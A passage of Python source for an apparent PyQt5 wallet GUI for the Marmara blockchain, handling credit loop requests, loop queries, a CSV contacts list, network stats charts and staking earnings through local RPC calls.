    Pubkey = \" + result.get('receiverpk'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --- Create Loop Request page functions ----\n\n @pyqtSlot()\n def marmarareceive(self):\n amount = self.make_credit_loop_amount_lineEdit.text()\n senderpk = self.make_credit_loop_senderpubkey_lineEdit.text()\n matures_date = self.make_credit_loop_matures_dateTimeEdit.dateTime()\n matures = self.change_datetime_to_block_age(matures_date)\n if amount and senderpk and matures:\n self.worker_marmarareceive = marmarachain_rpc.RpcHandler()\n method = cp.marmarareceive\n currency = self.make_credit_loop_currency_value_label.text()\n params = [senderpk, amount, currency, str(matures), {'avalcount': '0'}]\n self.bottom_info(self.tr('preparing loop request'))\n self.worker_thread(self.thread_marmarareceive, self.worker_marmarareceive, method, params,\n self.marmarareceive_result)\n else:\n self.bottom_info(self.tr('cannot make a credit loop request with empty fields'))\n logging.warning('cannot make a credit loop request with empty fields')\n\n @pyqtSlot(tuple)\n def marmarareceive_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n logging.info(result)\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to make a credit loop request'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info('Transaction aborted')\n logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # function name: marmararecieve_transfer\n # purpose: holder makes a marmarareceive request to the endorser to get the credit for selling the goods/services\n @pyqtSlot()\n def marmararecieve_transfer(self):\n senderpk = self.transfer_senderpubkey_lineEdit.text()\n baton = self.transfer_baton_lineEdit.text()\n if senderpk and baton:\n self.worker_marmarareceive_transfer = marmarachain_rpc.RpcHandler()\n method = cp.marmarareceive\n params = [senderpk, baton, {'avalcount': '0'}]\n self.worker_thread(self.thread_marmarareceive_transfer, self.worker_marmarareceive_transfer,\n method, params, self.marmararecieve_transfer_result)\n else:\n self.bottom_info(self.tr('cannot make a receive transfer request with empty fields'))\n logging.warning('cannot make a receive transfer request with empty fields')\n\n @pyqtSlot(tuple)\n def marmararecieve_transfer_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n logging.info(result)\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to make a request to the endorser'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result.get('hex'))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n 
logging.info('Transaction aborted')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # -------------------------------------------------------------------\n # Total Credit Loops page functions\n # --------------------------------------------------------------------\n @pyqtSlot()\n def search_active_loops(self):\n pubkey = self.current_pubkey_value.text()\n if pubkey:\n self.bottom_info(self.tr('getting active Loops details'))\n logging.info('getting active Loops details')\n self.worker_getloops = marmarachain_rpc.RpcHandler()\n method = cp.marmarainfo\n params = ['0', '0', '0', '0', pubkey]\n self.worker_thread(self.thread_getloops, self.worker_getloops, method, params, self.loops_details_result,\n execute='active_loops_details')\n else:\n self.bottom_info('pubkey not set!')\n self.clear_search_active_loops_labels()\n\n @pyqtSlot(tuple)\n def loops_details_result(self, result_out):\n if result_out[2] == 0:\n self.set_activeloops_table(result_out[0])\n self.set_loop_amount_result(result_out[1])\n self.refresh_loopinfo_button.setVisible(True)\n if result_out[2] == 1:\n self.bottom_err_info(result_out[1])\n logging.error(str(result_out[1]))\n\n def set_loop_amount_result(self, result):\n self.myCCActivatedAddress = str(result.get('myCCActivatedAddress'))\n self.normal_amount_value.setText(str(result.get('myPubkeyNormalAmount')))\n self.wallet_total_normal_value.setText(str(result.get('myWalletNormalAmount')))\n self.activated_amount_value.setText(str(result.get('myActivatedAmount')))\n self.activeloops_total_amount_value_label.setText(str(result.get('TotalLockedInLoop')))\n self.total_issuer_loop_amount_label_value.setText(str(result.get('totalamount')))\n self.closedloops_total_amount_value_label.setText(str(result.get('totalclosed')))\n self.activeloops_pending_number_value_label.setText(str(result.get('numpending')))\n self.closedloops_total_number_value_label.setText(str(result.get('numclosed')))\n self.numberof_total_activeloops_label_value.setText(str(len(result.get('Loops'))))\n my_total_normal = float(self.wallet_total_normal_value.text())\n my_total_activated = float(self.activated_amount_value.text())\n my_total_inloops = float(self.activeloops_total_amount_value_label.text())\n self.stats_amount_in_activated_lineEdit.setText(self.totalactivated_value_label.text())\n self.stats_amount_in_loops_lineEdit.setText(self.activeloops_total_amount_value_label.text())\n my_total = my_total_normal + my_total_activated + my_total_inloops\n self.my_stats_normal_label_value.setText(str(round((my_total_normal / my_total) * 100, 2)))\n self.my_stats_activated_label_value.setText(str(round((my_total_activated / my_total) * 100, 2)))\n self.my_stats_inloops_label_value.setText(str(round((my_total_inloops / my_total) * 100, 2)))\n\n @pyqtSlot(tuple)\n def marmarinfo_amount_and_loops_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n # self.wallet_total_activated_value.setText(str(result.get('myTotalAmountOnActivatedAddress')))\n self.bottom_info(self.tr('getting address amounts finished'))\n self.set_loop_amount_result(result)\n self.bottom_info(self.tr('finished searching marmara blockchain for all blocks for the set pubkey'))\n logging.info('finished searching marmara blockchain for all blocks for the set pubkey')\n self.refresh_loopinfo_button.setVisible(True)\n 
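# Editor's note, an assumption inferred from the surrounding slots: worker
# callbacks here receive result_out as a tuple in which result_out[0] carries
# the RPC stdout (JSON text), result_out[1] the error text, and composite
# workers append result_out[2] as a 0 (success) / 1 (failure) flag. A
# defensive unpacking sketch, illustrative only:
#
#     stdout, err, *flags = result_out
#     if flags and flags[0] == 1:
#         self.bottom_err_info(err)
#     elif stdout:
#         data = json.loads(stdout)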
if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n self.clear_search_active_loops_labels()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def set_activeloops_table(self, loop_info):\n self.activeloops_tableWidget.setColumnHidden(5, True)\n self.activeloops_tableWidget.setRowCount(len(loop_info))\n self.activeloops_tableWidget.setSortingEnabled(False)\n for section in loop_info:\n row_number = loop_info.index(section)\n for item in section:\n column_no = section.index(item)\n if column_no == 2:\n item = self.check_pubkey_contact_name(item)\n if column_no == 3 or column_no == 4:\n item = self.change_block_to_date(item)\n self.activeloops_tableWidget.setItem(row_number, column_no, QTableWidgetItem(str(item)))\n self.activeloops_tableWidget.horizontalHeader().setSectionResizeMode(column_no,\n QHeaderView.ResizeToContents)\n self.activeloops_tableWidget.setSortingEnabled(True)\n\n def clear_search_active_loops_labels(self):\n self.total_issuer_loop_amount_label_value.clear()\n self.closedloops_total_amount_value_label.clear()\n self.activeloops_pending_number_value_label.clear()\n self.closedloops_total_number_value_label.clear()\n\n def clear_search_holder_loops_labels(self):\n self.total_transferrable_loop_amount_label_value.clear()\n self.numberof_transferrable_loop_amount_label_value.clear()\n self.holderloops_closed_amount_label_value.clear()\n self.holderloops_closed_number_label_value.clear()\n\n @pyqtSlot()\n def marmaraholderloops(self):\n pubkey = self.current_pubkey_value.text()\n if pubkey:\n self.bottom_info(self.tr('getting transferable Loops details'))\n logging.info('getting transferable Loops details')\n self.worker_holderloops = marmarachain_rpc.RpcHandler()\n method = cp.marmaraholderloops\n params = ['0', '0', '0', '0', pubkey]\n self.worker_thread(self.thread_marmarholderloop, self.worker_holderloops, method, params,\n worker_output=self.marmaraholderloops_result, execute='holder_loop_detail')\n else:\n self.bottom_info('pubkey not set!')\n self.clear_search_holder_loops_labels()\n\n @pyqtSlot(tuple)\n def marmaraholderloops_result(self, result_out):\n if result_out[2] == 0:\n self.set_holder_loops_table(result_out[0])\n self.total_transferrable_loop_amount_label_value.setText(str(result_out[1].get('totalamount')))\n self.numberof_transferrable_loop_amount_label_value.setText(str(result_out[1].get('numpending')))\n self.holderloops_closed_amount_label_value.setText(str(result_out[1].get('totalclosed')))\n self.holderloops_closed_number_label_value.setText(str(result_out[1].get('numclosed')))\n if result_out[2] == 1:\n self.bottom_err_info(result_out[1])\n logging.error(str(result_out[1]))\n\n def set_holder_loops_table(self, loop_info):\n self.transferableloops_tableWidget.setColumnHidden(5, True)\n self.transferableloops_tableWidget.setRowCount(len(loop_info))\n self.transferableloops_tableWidget.setSortingEnabled(False)\n for section in loop_info:\n row_number = loop_info.index(section)\n for item in section:\n column_no = section.index(item)\n if column_no == 2:\n item = self.check_pubkey_contact_name(item)\n if column_no == 3 or column_no == 4:\n item = self.change_block_to_date(item)\n self.transferableloops_tableWidget.setItem(row_number, column_no, QTableWidgetItem(str(item)))\n self.transferableloops_tableWidget.horizontalHeader().setSectionResizeMode(column_no,\n QHeaderView.ResizeToContents)\n self.transferableloops_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot(int, int)\n def 
activeloop_itemcontext(self, row, column):\n item = self.activeloops_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n @pyqtSlot(int, int)\n def transferableloops_itemcontext(self, row, column):\n item = self.transferableloops_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n # -------------------------------------------------------------------\n # Credit Loop Queries functions\n # --------------------------------------------------------------------\n\n @pyqtSlot()\n def search_any_pubkey_loops(self):\n pubkey = self.loopqueries_pubkey_lineEdit.text()\n if pubkey:\n self.marmarainfo(pubkey, self.get_search_any_pubkey_loops_result)\n else:\n self.bottom_info('write pubkey to search!')\n logging.info('write pubkey to search!')\n self.clear_lq_txid_search_result()\n\n def get_search_any_pubkey_loops_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n result = json.loads(result_out[0])\n if result.get('result') == \"success\":\n self.lq_pubkey_address_label_value.setText(str(result.get('myNormalAddress')))\n self.lq_pubkeynormalamount_value_label.setText(str(result.get('myPubkeyNormalAmount')))\n self.lq_pubkeyactivatedamount_value_label.setText(str(result.get('myActivatedAmount')))\n self.lq_activeloopno_value_label.setText(str(result.get('numpending')))\n self.lq_pubkeyloopamount_value_label.setText(str(result.get('TotalLockedInLoop')))\n self.lq_closedloopno_value_label.setText(str(result.get('numclosed')))\n self.lq_pubkeyclosedloopamount_value_label.setText(str(result.get('totalclosed')))\n self.bottom_info(self.tr('finished searching marmarainfo'))\n logging.info('finished searching marmarainfo')\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n self.clear_lq_pubkey_result()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def clear_lq_pubkey_result(self):\n self.lq_pubkeynormalamount_value_label.clear()\n self.lq_pubkeyactivatedamount_value_label.clear()\n self.lq_activeloopno_value_label.clear()\n self.lq_pubkeyloopamount_value_label.clear()\n self.lq_closedloopno_value_label.clear()\n self.lq_pubkeyclosedloopamount_value_label.clear()\n\n def marmaracreditloop(self, txid):\n self.bottom_info(self.tr('getting credit loop info, please wait'))\n logging.info('getting credit loop info, please wait')\n self.worker_marmaracreditloop = marmarachain_rpc.RpcHandler()\n method = cp.marmaracreditloop\n params = [txid]\n marmaracreditloop_thread = self.worker_thread(self.thread_marmaracreditloop, self.worker_marmaracreditloop,\n method, params)\n return marmaracreditloop_thread\n\n @pyqtSlot()\n def search_loop_txid(self):\n txid = self.loopsearch_txid_lineEdit.text()\n if txid:\n marmaracreditloop = self.marmaracreditloop(txid)\n if self.chain_status:\n marmaracreditloop.command_out.connect(self.search_loop_txid_result)\n else:\n self.bottom_info(self.tr('write loop transaction id to search!'))\n logging.info('write loop transaction id to search!')\n self.clear_lq_txid_search_result()\n\n @pyqtSlot(tuple)\n def search_loop_txid_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n logging.info(result)\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n self.clear_lq_txid_search_result()\n else:\n creditloop = result.get('creditloop')\n if 
str(result.get('funcid')) == 'S':\n baton = str(result.get('settlement'))\n batonpk = str(result.get('pubkey'))\n amount = str(result.get('collected'))\n self.loopquery_baton_label.setText(self.tr('Txid (Settlement)'))\n issuerpk = str((creditloop[0]).get('issuerpk'))\n elif str(result.get('funcid')) == 'B':\n issuerpk = str(result.get('issuerpk'))\n amount = str(result.get('amount'))\n baton = str(result.get('createtxid'))\n batonpk = str(self.tr('Not issued yet!'))\n self.loopquery_baton_label.setText(self.tr('Txid (baton)'))\n else:\n baton = str(result.get('batontxid'))\n batonpk = str(result.get('batonpk'))\n amount = str(result.get('amount'))\n issuerpk = str((creditloop[0]).get('issuerpk'))\n self.loopquery_baton_label.setText(self.tr('Txid (baton)'))\n\n self.loopquery_baton_value.setText(baton)\n self.loopquery_amount_value.setText(amount)\n self.loopquery_currency_value.setText(result.get('currency'))\n self.loopquery_matures_value.setText(str(result.get('matures')))\n self.loopquery_batonpk_value.setText(batonpk)\n self.loopquery_issuer_value.setText(issuerpk)\n self.loopquery_transfercount_value.setText(str(result.get('n')))\n self.bottom_info(self.tr('credit loop info finished'))\n logging.info('credit loop info finished')\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n def clear_lq_txid_search_result(self):\n self.loopquery_baton_value.clear()\n self.loopquery_amount_value.clear()\n self.loopquery_batonpk_value.clear()\n self.loopquery_currency_value.clear()\n self.loopquery_matures_value.clear()\n self.loopquery_issuer_value.clear()\n\n # -------------------------------------------------------------------\n # Getting Contacts into comboboxes\n # --------------------------------------------------------------------\n def get_contact_names_addresses(self):\n self.contacts_address_comboBox.clear()\n self.receiver_address_lineEdit.clear()\n self.contacts_address_comboBox.addItem(self.tr('Contacts'))\n contacts_data = configuration.ContactsSettings().read_csv_file()\n for name in contacts_data:\n if name[0] != 'Name':\n self.contacts_address_comboBox.addItem(name[0])\n\n @pyqtSlot()\n def get_selected_contact_address(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contact_address = contacts_data[self.contacts_address_comboBox.currentIndex()]\n if selected_contact_address[1] != 'Address':\n self.receiver_address_lineEdit.setText(selected_contact_address[1])\n if selected_contact_address[1] == 'Address':\n self.receiver_address_lineEdit.clear()\n\n def get_contact_names_pubkeys(self):\n self.contactpk_makeloop_comboBox.clear()\n self.contactpk_transferrequest_comboBox.clear()\n self.contactpk_otherpk_looprequest_comboBox.clear()\n self.make_credit_loop_senderpubkey_lineEdit.clear()\n self.transfer_senderpubkey_lineEdit.clear()\n self.contactpk_makeloop_comboBox.addItem(self.tr('Contacts'))\n self.contactpk_transferrequest_comboBox.addItem(self.tr('Contacts'))\n self.contactpk_otherpk_looprequest_comboBox.addItem(self.tr('Contacts'))\n contacts_data = configuration.ContactsSettings().read_csv_file()\n for name in contacts_data:\n if name[0] != 'Name':\n self.contactpk_makeloop_comboBox.addItem(name[0])\n self.contactpk_transferrequest_comboBox.addItem(name[0])\n self.contactpk_otherpk_looprequest_comboBox.addItem(name[0])\n\n @pyqtSlot()\n def get_selected_contact_loop_pubkey(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contactpubkey_loop = 
contacts_data[self.contactpk_makeloop_comboBox.currentIndex()]\n if selected_contactpubkey_loop[2] != 'Pubkey':\n self.make_credit_loop_senderpubkey_lineEdit.setText(selected_contactpubkey_loop[2])\n if selected_contactpubkey_loop[2] == 'Pubkey':\n self.make_credit_loop_senderpubkey_lineEdit.clear()\n\n @pyqtSlot()\n def get_selected_contact_transfer_pubkey(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contactpubkey_transfer = contacts_data[self.contactpk_transferrequest_comboBox.currentIndex()]\n if selected_contactpubkey_transfer[2] != 'Pubkey':\n self.transfer_senderpubkey_lineEdit.setText(selected_contactpubkey_transfer[2])\n if selected_contactpubkey_transfer[2] == 'Pubkey':\n self.transfer_senderpubkey_lineEdit.clear()\n\n # -------------------------------------------------------------------\n # Adding contacts editing and deleting\n # --------------------------------------------------------------------\n @pyqtSlot()\n def add_contact(self):\n contact_name = self.contactname_lineEdit.text()\n contact_address = self.contactaddress_lineEdit.text().replace(' ', '')\n contact_pubkey = self.contactpubkey_lineEdit.text().replace(' ', '')\n contact_group = self.contactgroup_lineEdit.text().replace(' ', '')\n new_record = [contact_name, contact_address, contact_pubkey, contact_group]\n unique_record = self.unique_contacts(contact_name, contact_address, contact_pubkey)\n if unique_record:\n response = self.custom_message(self.tr(\"Error Adding Contact\"),\n unique_record.get('error'),\n \"information\",\n QMessageBox.Warning)\n if not unique_record:\n configuration.ContactsSettings().add_csv_file(new_record)\n read_contacts_data = configuration.ContactsSettings().read_csv_file()\n self.update_contact_tablewidget(read_contacts_data)\n self.clear_contacts_line_edit()\n response = self.custom_message(self.tr('Added Contact'),\n self.tr('It is your responsibility that the information you have entered '\n 'are correct and valid.'),\n \"information\",\n QMessageBox.Information)\n\n def unique_contacts(self, name, address, pubkey, contacts_data=None):\n if contacts_data:\n pass\n elif not contacts_data:\n contacts_data = configuration.ContactsSettings().read_csv_file()\n if name == address:\n return {'error': self.tr('Name and Address cannot be the same!')}\n if name == pubkey:\n return {'error': self.tr('Name and Pubkey cannot be the same!')}\n if pubkey == address:\n return {'error': self.tr('Pubkey and Address cannot be the same!')}\n for row in contacts_data:\n if row[0] == name:\n logging.error('same contact name exists')\n return {'error': self.tr('Same name exists')}\n if row[1] == address:\n logging.error('same address exists')\n return {'error': self.tr('Same address exists')}\n if row[2] == pubkey:\n logging.error('same pubkey exists')\n return {'error': self.tr('Same pubkey exists')}\n if not name or not address or not pubkey:\n logging.error('empty record')\n return {'error': self.tr('cannot be an empty record')}\n # is_valid_address = row[1] # check if address is valid\n # if is_valid_address == False:\n # return {'error': self.tr('address is not valid')}\n # is_valid_pubkey = row[2] # check if pubkey is valid\n # if is_valid_pubkey == False:\n # return {'error': self.tr('pubkey is not valid')}\n\n @pyqtSlot()\n def clear_contacts_line_edit(self):\n self.contactname_lineEdit.clear()\n self.contactaddress_lineEdit.clear()\n self.contactpubkey_lineEdit.clear()\n self.contactgroup_lineEdit.clear()\n self.contact_editing_row = None\n\n def 
update_contact_tablewidget(self, contacts_data=None):\n self.contacts_tableWidget.setSortingEnabled(False)\n if contacts_data:\n pass\n elif not contacts_data:\n contacts_data = configuration.ContactsSettings().read_csv_file()\n self.contacts_tableWidget.setRowCount(len(contacts_data) - 1) # -1 for exclude header\n del contacts_data[0]\n # self.contacts_tableWidget.autoScrollMargin()\n for row in contacts_data:\n row_number = contacts_data.index(row) # -1 for exclude header\n if len(row) < 4:\n row.append('')\n for item in row:\n self.contacts_tableWidget.setItem(row_number, row.index(item), QTableWidgetItem(str(item)))\n self.contacts_tableWidget.horizontalHeader().setSectionResizeMode(row.index(item),\n QHeaderView.ResizeToContents)\n self.contacts_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot(int, int)\n def get_contact_info(self, row, column):\n contact_name = \"\"\n contact_address = \"\"\n contact_pubkey = \"\"\n contact_group = \"\"\n if self.contacts_tableWidget.item(row, 0):\n contact_name = self.contacts_tableWidget.item(row, 0).text()\n if self.contacts_tableWidget.item(row, 1):\n contact_address = self.contacts_tableWidget.item(row, 1).text()\n if self.contacts_tableWidget.item(row, 2):\n contact_pubkey = self.contacts_tableWidget.item(row, 2).text()\n if self.contacts_tableWidget.item(row, 3):\n contact_group = self.contacts_tableWidget.item(row, 3).text()\n self.contactname_lineEdit.setText(contact_name)\n self.contactaddress_lineEdit.setText(contact_address)\n self.contactpubkey_lineEdit.setText(contact_pubkey)\n self.contactgroup_lineEdit.setText(contact_group)\n self.contact_editing_row = row\n\n @pyqtSlot()\n def update_contact(self):\n self.contacts_tableWidget.setSortingEnabled(False)\n if self.contact_editing_row is not None:\n read_contacts_data = configuration.ContactsSettings().read_csv_file()\n contact_name = self.contactname_lineEdit.text()\n contact_address = self.contactaddress_lineEdit.text().replace(' ', '')\n contact_pubkey = self.contactpubkey_lineEdit.text().replace(' ', '')\n contact_group = self.contactgroup_lineEdit.text().replace(' ', '')\n contact_data = configuration.ContactsSettings().read_csv_file()\n item_name = self.contacts_tableWidget.item(self.contact_editing_row, 0).text()\n for row in contact_data:\n if row[0] == item_name:\n self.contact_editing_row = contact_data.index(row)\n del contact_data[self.contact_editing_row] # removing editing record to don't check same record\n unique_record = self.unique_contacts(contact_name, contact_address, contact_pubkey, contact_data)\n if unique_record:\n self.bottom_info(unique_record.get('error'))\n logging.error(unique_record.get('error'))\n if not unique_record:\n read_contacts_data[self.contact_editing_row] = [contact_name, contact_address, contact_pubkey,\n contact_group]\n configuration.ContactsSettings().update_csv_file(read_contacts_data)\n self.update_contact_tablewidget()\n self.clear_contacts_line_edit()\n else:\n message_box = self.custom_message(self.tr('Error Updating Contact'),\n self.tr('You did not select a contact from table.'),\n \"information\",\n QMessageBox.Information)\n self.contacts_tableWidget.setSortingEnabled(True)\n\n @pyqtSlot()\n def delete_contact(self):\n if self.contact_editing_row is not None:\n message_box = self.custom_message(self.tr('Deleting Contact'),\n self.tr('Are you sure to delete the contact from the list?'),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n read_contacts_data = 
configuration.ContactsSettings().read_csv_file()\n del read_contacts_data[self.contact_editing_row + 1] # +1 for exclude header\n configuration.ContactsSettings().update_csv_file(read_contacts_data)\n self.update_contact_tablewidget()\n self.clear_contacts_line_edit()\n else:\n self.clear_contacts_line_edit()\n else:\n message_box = self.custom_message(self.tr('Error Deleting Contact'),\n self.tr('You did not select a contact from table.'),\n \"information\",\n QMessageBox.Information)\n\n # ------------------------\n # Stats Page\n # ------------------------\n\n @pyqtSlot()\n def get_marmara_stats(self):\n self.bottom_info(self.tr('getting stats values'))\n self.worker_mcl_stats = marmarachain_rpc.ApiWorker()\n self.worker_mcl_stats.moveToThread(self.thread_api_stats_request)\n self.worker_mcl_stats.finished.connect(self.thread_api_stats_request.quit)\n self.thread_api_stats_request.started.connect(self.worker_mcl_stats.mcl_stats_api)\n self.thread_api_stats_request.start()\n self.worker_mcl_stats.out_dict.connect(self.set_marmara_stats_values)\n self.worker_mcl_stats.out_err.connect(self.set_marmara_stats_err)\n self.stats_refresh_pushButton.setEnabled(False)\n QtCore.QTimer.singleShot(60000, self.stat_refresh_enable) # after 60 second it will enable button\n\n @pyqtSlot(dict)\n def set_marmara_stats_values(self, mcl_stats):\n mcl_stats_info = mcl_stats.get('info')\n self.stats_height_value_label.setText(str(mcl_stats_info.get('height')))\n self.stats_normal_label_value.setText(str(mcl_stats_info.get('TotalNormals')))\n self.stats_activated_label_value.setText(str(mcl_stats_info.get('TotalActivated')))\n self.stats_in_loops_label_value.setText(str(mcl_stats_info.get('TotalLockedInLoops')))\n self.bottom_info(self.tr('stats values retrieved'))\n self.stats_calculate_pushButton.setEnabled(True)\n self.stats_amount_in_activated_lineEdit.setEnabled(True)\n self.stats_amount_in_loops_lineEdit.setEnabled(True)\n total_supply = int(mcl_stats_info.get('TotalNormals')) + int(mcl_stats_info.get('TotalActivated')) + int(\n mcl_stats_info.get('TotalLockedInLoops'))\n total_normal_percentage = (int(mcl_stats_info.get('TotalNormals')) * 100) / total_supply\n total_activated_percentage = (int(mcl_stats_info.get('TotalActivated')) * 100) / total_supply\n total_inloops_percentage = (int(mcl_stats_info.get('TotalLockedInLoops')) * 100) / total_supply\n total_normal_per = round(total_normal_percentage, 2)\n total_activated_per = round(total_activated_percentage, 2)\n total_inloops_per = round(total_inloops_percentage, 2)\n self.stat_pie_chart(total_normal_per, total_activated_per, total_inloops_per)\n\n @pyqtSlot(str)\n def set_marmara_stats_err(self, err):\n if err == 'error':\n self.bottom_err_info(self.tr('Error in getting stats values'))\n\n def stat_pie_chart(self, normal, activated, inloops):\n if self.stats_layout.count() != 0:\n self.stats_layout.removeWidget(self.chartview)\n series = QPieSeries()\n series.append(\"Normal\", normal)\n series.append(\"Activated\", activated)\n series.append(\"In Loops\", inloops)\n\n series.setLabelsVisible(True)\n # color = [Qt.green, Qt.gray, Qt.magenta]\n series.setLabelsPosition(QtChart.QPieSlice.LabelOutside)\n for qslice in series.slices():\n qslice.setLabel(\"{:.2f}%\".format(100 * qslice.percentage()))\n # qslice.setBrush(color[series.slices().index(qslice)])\n\n chart = QChart()\n chart.legend().hide()\n chart.addSeries(series)\n chart.createDefaultAxes()\n chart.setAnimationOptions(QChart.SeriesAnimations)\n chart.legend().setVisible(True)\n 
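# Editor's note: removeWidget() at the top of this method only detaches the
# previous chart view from the layout; Qt does not free it. If the chart is
# rebuilt repeatedly, pairing the call with deleteLater() avoids piling up
# orphaned QChartView instances:
#
#     self.stats_layout.removeWidget(self.chartview)
#     self.chartview.deleteLater()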
chart.legend().setAlignment(Qt.AlignRight)\n chart.legend().markers(series)[0].setLabel(self.tr(\"Total Normal\"))\n chart.legend().markers(series)[1].setLabel(self.tr(\"Total Activated\"))\n chart.legend().markers(series)[2].setLabel(self.tr(\"Total In Loops\"))\n self.chartview = QChartView(chart)\n self.chartview.setRenderHint(QPainter.Antialiasing)\n self.stats_layout.addWidget(self.chartview)\n\n @pyqtSlot()\n def stat_refresh_enable(self):\n self.stats_refresh_pushButton.setEnabled(True)\n\n @pyqtSlot()\n def calculate_estimated_stake(self):\n total_activated = float(self.stats_activated_label_value.text())\n total_inloops = float(self.stats_in_loops_label_value.text())\n if self.stats_amount_in_activated_lineEdit.text():\n amount_activated = float(self.stats_amount_in_activated_lineEdit.text())\n else:\n amount_activated = 0\n self.stats_amount_in_activated_lineEdit.setText('0')\n if self.stats_amount_in_loops_lineEdit.text():\n amount_inloops = float(self.stats_amount_in_loops_lineEdit.text())\n else:\n amount_inloops = 0\n self.stats_amount_in_loops_lineEdit.setText('0')\n calculation = (((amount_activated / total_activated) + (amount_inloops / total_inloops) * 3) / 4) * 32400\n self.stats_estimated_staking_label_value.setText(str(calculation))\n # 30 * 60 * 24 * 0,75 = 32400\n\n @pyqtSlot()\n def get_wallet_earnings(self):\n if self.chain_status:\n start_datetime = self.earning_start_dateTimeEdit.dateTime()\n stop_datetime = self.earning_stop_dateTimeEdit.dateTime()\n latest_block = self.currentblock_value_label.text()\n beginheigth = int(latest_block) - int(self.change_datetime_to_block_age(start_datetime))\n endheigth = int(latest_block) - int(self.change_datetime_to_block_age(stop_datetime))\n if not beginheigth < endheigth <= int(latest_block):\n self.bottom_info(self.tr('Wrong Date Selection. 
start date should be less then stop date'))\n else:\n if (endheigth - beginheigth) <= 57600: # if more less 40 days\n self.worker_earnings = marmarachain_rpc.RpcHandler()\n method = cp.getblock\n params = [beginheigth, endheigth]\n self.worker_thread(self.thread_earnings, self.worker_earnings, method, params,\n worker_output=self.set_earnings_output, execute='wallet_earnings')\n else:\n self.bottom_info(self.tr('Difference between start and end dates cannot exceed 40 days'))\n else:\n self.bottom_info(self.tr('Marmarachain is not started'))\n logging.warning('Marmarachain is not started')\n\n @pyqtSlot(tuple)\n def set_earnings_output(self, output):\n if output[2] == 0:\n self.earning_stats_tableWidget.setRowCount(len(output[0]))\n normal_amount_sum = 0\n activated_amount_sum = 0\n row_index = 0\n for n_item, ac_item in zip(output[0], output[1]):\n normal_amount_sum = output[0].get(n_item) + normal_amount_sum\n activated_amount_sum = output[1].get(ac_item) + activated_amount_sum\n normal_amount = str(output[0].get(n_item))\n actve_amount = str(output[1].get(ac_item))\n total_amount = str(output[0].get(n_item) + output[1].get(ac_item))\n if configuration.ApplicationConfig().get_value('USER', 'lang') == 'TR':\n normal_amount = normal_amount.replace('.', ',')\n actve_amount = actve_amount.replace('.', ',')\n total_amount = total_amount.replace('.', ',')\n self.earning_stats_tableWidget.setItem(row_index, 0, QTableWidgetItem(str(n_item)))\n self.earning_stats_tableWidget.setItem(row_index, 1, QTableWidgetItem(normal_amount))\n self.earning_stats_tableWidget.setItem(row_index, 2, QTableWidgetItem(actve_amount))\n self.earning_stats_tableWidget.setItem(row_index, 3, QTableWidgetItem(total_amount))\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(0, QHeaderView.ResizeToContents)\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents)\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(2, QHeaderView.ResizeToContents)\n self.earning_stats_tableWidget.horizontalHeader().setSectionResizeMode(3, QHeaderView.ResizeToContents)\n if row_index < len(output[0]) - 1:\n row_index = row_index + 1\n self.normal_earning_value.setText(str(normal_amount_sum))\n self.activated_earning_value.setText(str(activated_amount_sum))\n self.total_earning_value.setText(str(normal_amount_sum + activated_amount_sum))\n self.bottom_info(self.tr('finished getting earning stats'))\n if output[2] == 1:\n self.bottom_err_info(output[1])\n\n @pyqtSlot(str)\n def earnings_output_info(self, output):\n if output == 'normal txids':\n self.bottom_info(self.tr('Getting normal addresses transactions'))\n if output == 'activated txids':\n self.bottom_info(self.tr('Getting activated addresses transactions'))\n if output == 'calculating earnings':\n self.bottom_info(self.tr('Calculating earnings for normal and activated addresses'))\n\n @pyqtSlot()\n def pay_for_export(self):\n if self.earning_stats_tableWidget.rowCount() > 0:\n team_address = 